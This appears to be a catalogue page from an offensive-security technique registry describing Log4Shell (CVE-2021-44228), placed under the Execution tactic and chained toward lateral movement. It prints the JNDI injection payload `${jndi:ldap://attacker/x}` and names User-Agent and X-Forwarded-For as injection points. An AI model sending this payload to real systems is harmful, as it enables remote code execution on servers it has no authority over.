CVE-LOG4SHELLExecution

Log4Shell (CVE-2021-44228)

JNDI lookup in log4j 2.x — ${jndi:ldap://attacker} in any logged user input triggers JNDI resolution → arbitrary class load → RCE.

§ Where this technique fits

CVE-LOG4SHELL is catalogued under the Execution tactic of the offensive-security kill-chain. It appears in 1 approved dossier in the registry, typically at step 2 on average.

§ Dossiers chaining this technique

Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
step 2 / 6

§ What commonly comes next

01
Exploit Public-Facing Application
T1190 · Initial Access
seen 1×

§ Where this technique fits

§ Dossiers chaining this technique

Log4Shell (CVE-2021-44228) → RCE → lateral

§ What commonly comes next